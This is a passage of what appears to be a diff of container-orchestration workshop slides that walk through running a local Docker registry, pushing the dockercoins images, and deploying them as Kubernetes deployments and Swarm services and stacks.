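  | sudo tee /etc/docker/daemon.json
sudo systemctl restart docker
```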
|
||||
|
||||
---
|
||||
|
||||
# Deploying a self-hosted registry
|
||||
|
||||
- We will deploy a registry container, and expose it with a NodePort
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the registry service:
|
||||
```bash
|
||||
kubectl run registry --image=registry:2
|
||||
```
|
||||
|
||||
- Expose it on a NodePort:
|
||||
```bash
|
||||
kubectl expose deploy/registry --port=5000 --type=NodePort
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Connecting to our registry
|
||||
|
||||
- We need to find out which port has been allocated
|
||||
|
||||
.exercise[
|
||||
|
||||
- View the service details:
|
||||
```bash
|
||||
kubectl describe svc/registry
|
||||
```
|
||||
|
||||
- Get the port number programmatically:
|
||||
```bash
|
||||
NODEPORT=$(kubectl get svc/registry -o json | jq .spec.ports[0].nodePort)
|
||||
REGISTRY=127.0.0.1:$NODEPORT
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing our registry
|
||||
|
||||
- A convenient Docker registry API route to remember is `/v2/_catalog`
|
||||
|
||||
.exercise[
|
||||
|
||||
- View the repositories currently held in our registry:
|
||||
```bash
|
||||
curl $REGISTRY/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
We should see:
|
||||
```json
|
||||
{"repositories":[]}
|
||||
```
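
The catalog route only lists repository names. To list the tags of a given repository, there is a per-repository route (shown here for `busybox`, once it has been pushed):

```bash
curl $REGISTRY/v2/busybox/tags/list
```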
|
||||
|
||||
---
|
||||
|
||||
## Testing our local registry
|
||||
|
||||
- We can retag a small image, and push it to the registry
|
||||
|
||||
.exercise[
|
||||
|
||||
- Make sure we have the busybox image, and retag it:
|
||||
```bash
|
||||
docker pull busybox
|
||||
docker tag busybox $REGISTRY/busybox
|
||||
```
|
||||
|
||||
- Push it:
|
||||
```bash
|
||||
docker push $REGISTRY/busybox
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking again what's on our local registry
|
||||
|
||||
- Let's use the same endpoint as before
|
||||
|
||||
.exercise[
|
||||
|
||||
- Ensure that our busybox image is now in the local registry:
|
||||
```bash
|
||||
curl $REGISTRY/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The curl command should now output:
|
||||
```json
|
||||
{"repositories":["busybox"]}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Building and pushing our images
|
||||
|
||||
- We are going to use a convenient feature of Docker Compose
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `stacks` directory:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/stacks
|
||||
```
|
||||
|
||||
- Build and push the images:
|
||||
```bash
|
||||
docker-compose -f dockercoins.yml build
|
||||
docker-compose -f dockercoins.yml push
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Let's have a look at the `dockercoins.yml` file while this is building and pushing.
|
||||
|
||||
---
|
||||
|
||||
```yaml
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
rng:
|
||||
build: dockercoins/rng
|
||||
image: ${REGISTRY-127.0.0.1:5000}/rng:${TAG-latest}
|
||||
deploy:
|
||||
mode: global
|
||||
...
|
||||
redis:
|
||||
image: redis
|
||||
...
|
||||
worker:
|
||||
build: dockercoins/worker
|
||||
image: ${REGISTRY-127.0.0.1:5000}/worker:${TAG-latest}
|
||||
...
|
||||
deploy:
|
||||
replicas: 10
|
||||
```
|
||||
|
||||
.warning[Just in case you were wondering ... Docker "services" are not Kubernetes "services".]
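
The `${REGISTRY-127.0.0.1:5000}` syntax is Compose's shell-style variable substitution: it expands to `$REGISTRY` if that variable is set, and falls back to `127.0.0.1:5000` otherwise. For instance (the values below are just examples):

```bash
REGISTRY=127.0.0.1:31500 TAG=v0.1 docker-compose -f dockercoins.yml build
```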
|
||||
|
||||
---
|
||||
|
||||
## Deploying all the things
|
||||
|
||||
- We can now deploy our code (as well as a redis instance)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy `redis`:
|
||||
```bash
|
||||
kubectl run redis --image=redis
|
||||
```
|
||||
|
||||
- Deploy everything else:
|
||||
```bash
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
kubectl run $SERVICE --image=$REGISTRY/$SERVICE
|
||||
done
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Is this working?
|
||||
|
||||
- After waiting for the deployment to complete, let's look at the logs!
|
||||
|
||||
(Hint: use `kubectl get deploy -w` to watch deployment events)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look at some logs:
|
||||
```bash
|
||||
kubectl logs deploy/rng
|
||||
kubectl logs deploy/worker
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
🤔 `rng` is fine ... But not `worker`.
|
||||
|
||||
--
|
||||
|
||||
💡 Oh right! We forgot to `expose`.
|
||||
|
||||
---
|
||||
|
||||
# Exposing services internally
|
||||
|
||||
- Three deployments need to be reachable by others: `hasher`, `redis`, `rng`
|
||||
|
||||
- `worker` doesn't need to be exposed
|
||||
|
||||
- `webui` will be dealt with later
|
||||
|
||||
.exercise[
|
||||
|
||||
- Expose each deployment, specifying the right port:
|
||||
```bash
|
||||
kubectl expose deployment redis --port 6379
|
||||
kubectl expose deployment rng --port 80
|
||||
kubectl expose deployment hasher --port 80
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Is this working yet?
|
||||
|
||||
- The `worker` runs an infinite loop that retries 10 seconds after an error
|
||||
|
||||
.exercise[
|
||||
|
||||
- Stream the worker's logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --follow
|
||||
```
|
||||
|
||||
(Give it about 10 seconds to recover)
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
We should now see the `worker`, well, working happily.
|
||||
|
||||
---
|
||||
|
||||
# Exposing services for external access
|
||||
|
||||
- Now we would like to access the Web UI
|
||||
|
||||
- We will expose it with a `NodePort`
|
||||
|
||||
(just like we did for the registry)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a `NodePort` service for the Web UI:
|
||||
```bash
|
||||
kubectl expose deploy/webui --type=NodePort --port=80
|
||||
```
|
||||
|
||||
- Check the port that was allocated:
|
||||
```bash
|
||||
kubectl get svc
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Accessing the web UI
|
||||
|
||||
- We can now connect to *any node*, on the allocated node port, to view the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Open the web UI in your browser (http://node-ip-address:3xxxx/)
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
*Alright, we're back to where we started, when we were running on a single node!*
|
||||
@@ -1,976 +0,0 @@
|
||||
class: title
|
||||
|
||||
Our app on Swarm
|
||||
|
||||
---
|
||||
|
||||
## What's on the menu?
|
||||
|
||||
In this part, we will:
|
||||
|
||||
- **build** images for our app,
|
||||
|
||||
- **ship** these images with a registry,
|
||||
|
||||
- **run** services using these images.
|
||||
|
||||
---
|
||||
|
||||
## Why do we need to ship our images?
|
||||
|
||||
- When we do `docker-compose up`, images are built for our services
|
||||
|
||||
- These images are present only on the local node
|
||||
|
||||
- We need these images to be distributed on the whole Swarm
|
||||
|
||||
- The easiest way to achieve that is to use a Docker registry
|
||||
|
||||
- Once our images are on a registry, we can reference them when
|
||||
creating our services
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Build, ship, and run, for a single service
|
||||
|
||||
If we had only one service (built from a `Dockerfile` in the
|
||||
current directory), our workflow could look like this:
|
||||
|
||||
```
|
||||
docker build -t jpetazzo/doublerainbow:v0.1 .
|
||||
docker push jpetazzo/doublerainbow:v0.1
|
||||
docker service create jpetazzo/doublerainbow:v0.1
|
||||
```
|
||||
|
||||
We just have to adapt this to our application, which has 4 services!
|
||||
|
||||
---
|
||||
|
||||
## The plan
|
||||
|
||||
- Build on our local node (`node1`)
|
||||
|
||||
- Tag images so that they are named `localhost:5000/servicename`
|
||||
|
||||
- Upload them to a registry
|
||||
|
||||
- Create services using the images
|
||||
|
||||
---
|
||||
|
||||
## Which registry do we want to use?
|
||||
|
||||
.small[
|
||||
|
||||
- **Docker Hub**
|
||||
|
||||
- hosted by Docker Inc.
|
||||
- requires an account (free, no credit card needed)
|
||||
- images will be public (unless you pay)
|
||||
- located in AWS EC2 us-east-1
|
||||
|
||||
- **Docker Trusted Registry**
|
||||
|
||||
- self-hosted commercial product
|
||||
- requires a subscription (free 30-day trial available)
|
||||
- images can be public or private
|
||||
- located wherever you want
|
||||
|
||||
- **Docker open source registry**
|
||||
|
||||
- self-hosted barebones repository hosting
|
||||
- doesn't require anything
|
||||
- doesn't come with anything either
|
||||
- located wherever you want
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Using Docker Hub
|
||||
|
||||
*If we wanted to use the Docker Hub...*
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^{
|
||||
```
|
||||
-->
|
||||
|
||||
- We would log into the Docker Hub:
|
||||
```bash
|
||||
docker login
|
||||
```
|
||||
|
||||
- And in the following slides, we would use our Docker Hub login
|
||||
(e.g. `jpetazzo`) instead of the registry address (i.e. `127.0.0.1:5000`)
|
||||
|
||||
<!--
|
||||
```meta
|
||||
^}
|
||||
```
|
||||
-->
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Using Docker Trusted Registry
|
||||
|
||||
*If we wanted to use DTR, we would...*
|
||||
|
||||
- Make sure we have a Docker Hub account
|
||||
|
||||
- [Activate a Docker Datacenter subscription](
|
||||
https://hub.docker.com/enterprise/trial/)
|
||||
|
||||
- Install DTR on our machines
|
||||
|
||||
- Use `dtraddress:port/user` instead of the registry address
|
||||
|
||||
*This is out of the scope of this workshop!*
|
||||
|
||||
---
|
||||
|
||||
## Using the open source registry
|
||||
|
||||
- We need to run a `registry:2` container
|
||||
<br/>(make sure you specify tag `:2` to run the new version!)
|
||||
|
||||
- It will store images and layers to the local filesystem
|
||||
<br/>(but you can add a config file to use S3, Swift, etc.)
|
||||
|
||||
- Docker *requires* TLS when communicating with the registry
|
||||
|
||||
  - except for registries on `127.0.0.0/8` (i.e. `localhost`)
|
||||
|
||||
- or with the Engine flag `--insecure-registry`
|
||||
|
||||
<!-- -->
|
||||
|
||||
- Our strategy: publish the registry container on port 5000,
|
||||
<br/>so that it's available through `127.0.0.1:5000` on each node
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
# Deploying a local registry
|
||||
|
||||
- We will create a single-instance service, publishing its port
|
||||
on the whole cluster
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the registry service:
|
||||
```bash
|
||||
docker service create --name registry --publish 5000:5000 registry:2
|
||||
```
|
||||
|
||||
- Now try the following command; it should return `{"repositories":[]}`:
|
||||
```bash
|
||||
curl 127.0.0.1:5000/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
(If that doesn't work, wait a few seconds and try again.)
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Testing our local registry
|
||||
|
||||
- We can retag a small image, and push it to the registry
|
||||
|
||||
.exercise[
|
||||
|
||||
- Make sure we have the busybox image, and retag it:
|
||||
```bash
|
||||
docker pull busybox
|
||||
docker tag busybox 127.0.0.1:5000/busybox
|
||||
```
|
||||
|
||||
- Push it:
|
||||
```bash
|
||||
docker push 127.0.0.1:5000/busybox
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Checking what's on our local registry
|
||||
|
||||
- The registry API has endpoints to query what's there
|
||||
|
||||
.exercise[
|
||||
|
||||
- Ensure that our busybox image is now in the local registry:
|
||||
```bash
|
||||
curl http://127.0.0.1:5000/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The curl command should now output:
|
||||
```json
|
||||
{"repositories":["busybox"]}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Build, tag, and push our application container images
|
||||
|
||||
- Compose has named our images `dockercoins_XXX` for each service
|
||||
|
||||
- We need to retag them (to `127.0.0.1:5000/XXX:v1`) and push them
|
||||
|
||||
.exercise[
|
||||
|
||||
- Set `REGISTRY` and `TAG` environment variables to use our local registry
|
||||
- And run this little for loop:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
REGISTRY=127.0.0.1:5000 TAG=v1
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
docker tag dockercoins_$SERVICE $REGISTRY/$SERVICE:$TAG
|
||||
docker push $REGISTRY/$SERVICE
|
||||
done
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
# Overlay networks
|
||||
|
||||
- SwarmKit integrates with overlay networks
|
||||
|
||||
- Networks are created with `docker network create`
|
||||
|
||||
- Make sure to specify that you want an *overlay* network
|
||||
<br/>(otherwise you will get a local *bridge* network by default)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create an overlay network for our application:
|
||||
```bash
|
||||
docker network create --driver overlay dockercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Viewing existing networks
|
||||
|
||||
- Let's confirm that our network was created
|
||||
|
||||
.exercise[
|
||||
|
||||
- List existing networks:
|
||||
```bash
|
||||
docker network ls
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Can you spot the differences?
|
||||
|
||||
The networks `dockercoins` and `ingress` are different from the other ones.
|
||||
|
||||
Can you see how?
|
||||
|
||||
--
|
||||
|
||||
class: manual-btp
|
||||
|
||||
- They are using a different kind of ID, reflecting the fact that they
|
||||
are SwarmKit objects instead of "classic" Docker Engine objects.
|
||||
|
||||
- Their *scope* is `swarm` instead of `local`.
|
||||
|
||||
- They are using the overlay driver.
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp, extra-details
|
||||
|
||||
## Caveats
|
||||
|
||||
.warning[In Docker 1.12, you cannot join an overlay network with `docker run --net ...`.]
|
||||
|
||||
Starting with version 1.13, you can, if the network was created with the `--attachable` flag.
|
||||
|
||||
*Why is that?*
|
||||
|
||||
Placing a container on a network requires allocating an IP address for this container.
|
||||
|
||||
The allocation must be done by a manager node (worker nodes cannot update Raft data).
|
||||
|
||||
As a result, `docker run --net ...` requires collaboration with manager nodes.
|
||||
|
||||
It alters the code path for `docker run`, so it is allowed only under strict circumstances.
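
With Docker 1.13 or later, the attachable variant is a one-flag change (the network name below is just an example):

```bash
docker network create --driver overlay --attachable mynet
docker run --rm --net mynet alpine ip addr
```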
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Run the application
|
||||
|
||||
- First, create the `redis` service; that one is using a Docker Hub image
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the `redis` service:
|
||||
```bash
|
||||
docker service create --network dockercoins --name redis redis
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Run the other services
|
||||
|
||||
- Then, start the other services one by one
|
||||
|
||||
- We will use the images pushed previously
|
||||
|
||||
.exercise[
|
||||
|
||||
- Start the other services:
|
||||
```bash
|
||||
REGISTRY=127.0.0.1:5000
|
||||
TAG=v1
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
docker service create --network dockercoins --detach=true \
|
||||
--name $SERVICE $REGISTRY/$SERVICE:$TAG
|
||||
done
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
???
|
||||
|
||||
## Wait for our application to be up
|
||||
|
||||
- We will see later a way to watch progress for all the tasks of the cluster
|
||||
|
||||
- But for now, a scrappy shell loop will do the trick
|
||||
|
||||
.exercise[
|
||||
|
||||
- Repeatedly display the status of all our services:
|
||||
```bash
|
||||
watch "docker service ls -q | xargs -n1 docker service ps"
|
||||
```
|
||||
|
||||
- Stop it once everything is running
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Expose our application web UI
|
||||
|
||||
- We need to connect to the `webui` service, but it is not publishing any port
|
||||
|
||||
- Let's reconfigure it to publish a port
|
||||
|
||||
.exercise[
|
||||
|
||||
- Update `webui` so that we can connect to it from outside:
|
||||
```bash
|
||||
docker service update webui --publish-add 8000:80 --detach=false
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: to "de-publish" a port, you would have to specify the container port.
|
||||
<br/>(i.e. in that case, `--publish-rm 80`)
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## What happens when we modify a service?
|
||||
|
||||
- Let's find out what happened to our `webui` service
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look at the tasks and containers associated to `webui`:
|
||||
```bash
|
||||
docker service ps webui
|
||||
```
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
class: manual-btp
|
||||
|
||||
The first version of the service (the one that was not exposed) has been shut down.
|
||||
|
||||
It has been replaced by the new version, with port 80 accessible from outside.
|
||||
|
||||
(This will be discussed in more detail in the section about stateful services.)
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Connect to the web UI
|
||||
|
||||
- The web UI is now available on port 8000, *on all the nodes of the cluster*
|
||||
|
||||
.exercise[
|
||||
|
||||
- If you're using Play-With-Docker, just click on the `(8000)` badge
|
||||
|
||||
- Otherwise, point your browser to any node, on port 8000
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Scaling the application
|
||||
|
||||
- We can change scaling parameters with `docker service update` as well
|
||||
|
||||
- We will do the equivalent of `docker-compose scale`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Bring up more workers:
|
||||
```bash
|
||||
docker service update worker --replicas 10 --detach=false
|
||||
```
|
||||
|
||||
- Check the result in the web UI
|
||||
|
||||
]
|
||||
|
||||
You should see the performance peaking at 10 hashes/s (like before).
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
# Global scheduling
|
||||
|
||||
- We want to make the best possible use of the entropy generators
|
||||
on our nodes
|
||||
|
||||
- We want to run exactly one `rng` instance per node
|
||||
|
||||
- SwarmKit has a special scheduling mode for that, let's use it
|
||||
|
||||
- We cannot enable/disable global scheduling on an existing service
|
||||
|
||||
- We have to destroy and re-create the `rng` service
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Scaling the `rng` service
|
||||
|
||||
.exercise[
|
||||
|
||||
- Remove the existing `rng` service:
|
||||
```bash
|
||||
docker service rm rng
|
||||
```
|
||||
|
||||
- Re-create the `rng` service with *global scheduling*:
|
||||
```bash
|
||||
docker service create --name rng --network dockercoins --mode global \
|
||||
--detach=false $REGISTRY/rng:$TAG
|
||||
```
|
||||
|
||||
- Look at the result in the web UI
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details, manual-btp
|
||||
|
||||
## Why do we have to re-create the service to enable global scheduling?
|
||||
|
||||
- Enabling it dynamically would make rolling updates semantics very complex
|
||||
|
||||
- This might change in the future (after all, it was possible in 1.12 RC!)
|
||||
|
||||
- As of Docker Engine 17.05, other parameters that require a `rm`/`create` of the service are:
|
||||
|
||||
- service name
|
||||
|
||||
- hostname
|
||||
|
||||
- network
|
||||
|
||||
---
|
||||
|
||||
class: swarm-ready
|
||||
|
||||
## How did we make our app "Swarm-ready"?
|
||||
|
||||
This app was written in June 2015. (One year before Swarm mode was released.)
|
||||
|
||||
What did we change to make it compatible with Swarm mode?
|
||||
|
||||
--
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the app directory:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/dockercoins
|
||||
```
|
||||
|
||||
- See modifications in the code:
|
||||
```bash
|
||||
git log -p --since "4-JUL-2015" -- . ':!*.yml*' ':!*.html'
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: swarm-ready
|
||||
|
||||
## What did we change in our app since its inception?
|
||||
|
||||
- Compose files
|
||||
|
||||
- HTML file (it contains an embedded contextual tweet)
|
||||
|
||||
- Dockerfiles (to switch to smaller images)
|
||||
|
||||
- That's it!
|
||||
|
||||
--
|
||||
|
||||
class: swarm-ready
|
||||
|
||||
*We didn't change a single line of code in this app since it was written.*
|
||||
|
||||
--
|
||||
|
||||
class: swarm-ready
|
||||
|
||||
*The images that were [built in June 2015](
|
||||
https://hub.docker.com/r/jpetazzo/dockercoins_worker/tags/)
|
||||
(when the app was written) can still run today ...
|
||||
<br/>... in Swarm mode (distributed across a cluster, with load balancing) ...
|
||||
<br/>... without any modification.*
|
||||
|
||||
---
|
||||
|
||||
class: swarm-ready
|
||||
|
||||
## How did we design our app in the first place?
|
||||
|
||||
- [Twelve-Factor App](https://12factor.net/) principles
|
||||
|
||||
- Service discovery using DNS names
|
||||
|
||||
- Initially implemented as "links"
|
||||
|
||||
- Then "ambassadors"
|
||||
|
||||
- And now "services"
|
||||
|
||||
- Existing apps might require more changes!
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
# Integration with Compose
|
||||
|
||||
- The previous section showed us how to streamline image build and push
|
||||
|
||||
- We will now see how to streamline service creation
|
||||
|
||||
(i.e. get rid of the `for SERVICE in ...; do docker service create ...` part)
|
||||
|
||||
---
|
||||
|
||||
## Compose file version 3
|
||||
|
||||
(New in Docker Engine 1.13)
|
||||
|
||||
- Almost identical to version 2
|
||||
|
||||
- Can be directly used by a Swarm cluster through `docker stack ...` commands
|
||||
|
||||
- Introduces a `deploy` section to pass Swarm-specific parameters
|
||||
|
||||
- Resource limits are moved to this `deploy` section (see the example after this list)
|
||||
|
||||
- See [here](https://github.com/aanand/docker.github.io/blob/8524552f99e5b58452fcb1403e1c273385988b71/compose/compose-file.md#upgrading) for the complete list of changes
|
||||
|
||||
- Supersedes *Distributed Application Bundles*
|
||||
|
||||
(JSON payload describing an application; could be generated from a Compose file)
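
As an illustrative sketch (the service and values are assumptions, not taken from this workshop's files), a v3 service with Swarm-specific parameters looks like:

```yaml
version: "3"

services:
  worker:
    image: 127.0.0.1:5000/worker:v1
    deploy:
      replicas: 10
      resources:
        limits:
          cpus: "0.5"
          memory: 128M
```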
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Removing everything
|
||||
|
||||
- Before deploying using "stacks," let's get a clean slate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Remove *all* the services:
|
||||
```bash
|
||||
docker service ls -q | xargs docker service rm
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Our first stack
|
||||
|
||||
We need a registry to move images around.
|
||||
|
||||
Without a stack file, it would be deployed with the following command:
|
||||
|
||||
```bash
|
||||
docker service create --publish 5000:5000 registry:2
|
||||
```
|
||||
|
||||
Now, we are going to deploy it with the following stack file:
|
||||
|
||||
```yaml
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
registry:
|
||||
image: registry:2
|
||||
ports:
|
||||
- "5000:5000"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Checking our stack files
|
||||
|
||||
- All the stack files that we will use are in the `stacks` directory
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `stacks` directory:
|
||||
```bash
|
||||
cd ~/orchestration-workshop/stacks
|
||||
```
|
||||
|
||||
- Check `registry.yml`:
|
||||
```bash
|
||||
cat registry.yml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying our first stack
|
||||
|
||||
- All stack manipulation commands start with `docker stack`
|
||||
|
||||
- Under the hood, they map to `docker service` commands
|
||||
|
||||
- Stacks have a *name* (which also serves as a namespace)
|
||||
|
||||
- Stacks are specified with the aforementioned Compose file format version 3
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy our local registry:
|
||||
```bash
|
||||
docker stack deploy registry --compose-file registry.yml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Inspecting stacks
|
||||
|
||||
- `docker stack ps` shows the detailed state of all services of a stack
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that our registry is running correctly:
|
||||
```bash
|
||||
docker stack ps registry
|
||||
```
|
||||
|
||||
- Confirm that we get the same output with the following command:
|
||||
```bash
|
||||
docker service ps registry_registry
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: manual-btp
|
||||
|
||||
## Specifics of stack deployment
|
||||
|
||||
Our registry is not *exactly* identical to the one deployed with `docker service create`!
|
||||
|
||||
- Each stack gets its own overlay network
|
||||
|
||||
- Services of the stack are connected to this network
|
||||
<br/>(unless specified differently in the Compose file)
|
||||
|
||||
- Services get network aliases matching their name in the Compose file
|
||||
<br/>(just like when Compose brings up an app specified in a v2 file)
|
||||
|
||||
- Services are explicitly named `<stack_name>_<service_name>`
|
||||
|
||||
- Services and tasks also get an internal label indicating which stack they belong to
|
||||
|
||||
---
|
||||
|
||||
class: auto-btp
|
||||
|
||||
## Testing our local registry
|
||||
|
||||
- Connecting to port 5000 *on any node of the cluster* routes us to the registry
|
||||
|
||||
- Therefore, we can use `localhost:5000` or `127.0.0.1:5000` as our registry
|
||||
|
||||
.exercise[
|
||||
|
||||
- Issue the following API request to the registry:
|
||||
```bash
|
||||
curl 127.0.0.1:5000/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
It should return:
|
||||
|
||||
```json
|
||||
{"repositories":[]}
|
||||
```
|
||||
|
||||
If that doesn't work, retry a few times; perhaps the container is still starting.
|
||||
|
||||
---
|
||||
|
||||
class: auto-btp
|
||||
|
||||
## Pushing an image to our local registry
|
||||
|
||||
- We can retag a small image, and push it to the registry
|
||||
|
||||
.exercise[
|
||||
|
||||
- Make sure we have the busybox image, and retag it:
|
||||
```bash
|
||||
docker pull busybox
|
||||
docker tag busybox 127.0.0.1:5000/busybox
|
||||
```
|
||||
|
||||
- Push it:
|
||||
```bash
|
||||
docker push 127.0.0.1:5000/busybox
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: auto-btp
|
||||
|
||||
## Checking what's on our local registry
|
||||
|
||||
- The registry API has endpoints to query what's there
|
||||
|
||||
.exercise[
|
||||
|
||||
- Ensure that our busybox image is now in the local registry:
|
||||
```bash
|
||||
curl http://127.0.0.1:5000/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The curl command should now output:
|
||||
```json
|
||||
"repositories":["busybox"]}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Building and pushing stack services
|
||||
|
||||
- When using Compose file version 2 and above, you can specify *both* `build` and `image`
|
||||
|
||||
- When both keys are present:
|
||||
|
||||
- Compose does "business as usual" (uses `build`)
|
||||
|
||||
- but the resulting image is named as indicated by the `image` key
|
||||
<br/>
|
||||
(instead of `<projectname>_<servicename>:latest`)
|
||||
|
||||
- it can be pushed to a registry with `docker-compose push`
|
||||
|
||||
- Example:
|
||||
|
||||
```yaml
|
||||
webfront:
|
||||
build: www
|
||||
image: myregistry.company.net:5000/webfront
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Using Compose to build and push images
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try it:
|
||||
```bash
|
||||
docker-compose -f dockercoins.yml build
|
||||
docker-compose -f dockercoins.yml push
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Let's have a look at the `dockercoins.yml` file while this is building and pushing.
|
||||
|
||||
---
|
||||
|
||||
```yaml
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
rng:
|
||||
build: dockercoins/rng
|
||||
image: ${REGISTRY-127.0.0.1:5000}/rng:${TAG-latest}
|
||||
deploy:
|
||||
mode: global
|
||||
...
|
||||
redis:
|
||||
image: redis
|
||||
...
|
||||
worker:
|
||||
build: dockercoins/worker
|
||||
image: ${REGISTRY-127.0.0.1:5000}/worker:${TAG-latest}
|
||||
...
|
||||
deploy:
|
||||
replicas: 10
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Deploying the application
|
||||
|
||||
- Now that the images are on the registry, we can deploy our application stack
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the application stack:
|
||||
```bash
|
||||
docker stack deploy dockercoins --compose-file dockercoins.yml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We can now connect to any of our nodes on port 8000, and we will see the familiar hashing speed graph.
|
||||
|
||||
---
|
||||
|
||||
## Maintaining multiple environments
|
||||
|
||||
There are many ways to handle variations between environments.
|
||||
|
||||
- Compose loads `docker-compose.yml` and (if it exists) `docker-compose.override.yml`
|
||||
|
||||
- Compose can load alternate file(s) by setting the `-f` flag or the `COMPOSE_FILE` environment variable (see the example below)
|
||||
|
||||
- Compose files can *extend* other Compose files, selectively including services:
|
||||
|
||||
```yaml
|
||||
web:
|
||||
extends:
|
||||
file: common-services.yml
|
||||
service: webapp
|
||||
```
|
||||
|
||||
See [this documentation page](https://docs.docker.com/compose/extends/) for more details about these techniques.
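
For instance, a hypothetical production override can be layered on top of the base file (the file names are assumptions):

```bash
docker-compose -f docker-compose.yml -f docker-compose.prod.yml up -d
```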
|
||||
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Good to know ...
|
||||
|
||||
- Compose file version 3 adds the `deploy` section
|
||||
|
||||
- Further versions (3.1, ...) add more features (secrets, configs ...)
|
||||
|
||||
- You can re-run `docker stack deploy` to update a stack
|
||||
|
||||
- You can make manual changes with `docker service update` ...
|
||||
|
||||
- ... But they will be wiped out each time you `docker stack deploy`
|
||||
|
||||
(That's the intended behavior, when one thinks about it!)
|
||||
|
||||
